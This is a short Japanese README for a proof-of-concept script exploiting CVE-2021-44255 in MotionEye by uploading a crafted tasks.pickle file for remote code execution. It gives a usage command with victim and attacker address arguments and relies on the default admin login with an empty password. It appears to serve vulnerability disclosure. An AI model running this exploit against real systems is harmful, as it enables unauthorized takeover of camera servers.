
MotionEye で RCE を可能にする tasks.pickle ファイルをアップロードする Python 3 スクリプト。CVE-2021-44255
MotionEyeにRCEを可能にするtasks.pickleファイルをアップロードするPython 3スクリプトです。管理者資格情報が必要なので、それほど大した問題ではないはずです。残念ながら、MotionEye/MotionEyeOSはデフォルトの資格情報で実行されていることがよくあります。
例:
main.py --victim 192.168.1.2 --attacker 192.168.1.3:4444
victimとattackerはip:portの形式です。ただし、ポート80の場合はポートを省略できます。これはデフォルトのユーザー名adminと空のパスワードを使用します。別のユーザー名/パスワードのためのCLIオプションもあります。詳細はコードを参照してください。
CVE-2021-44255
この問題やその他の問題に関する解説は、https://www.pizzapower.me/2021/10/09/self-hosted-security-part-1-motioneye を参照してください。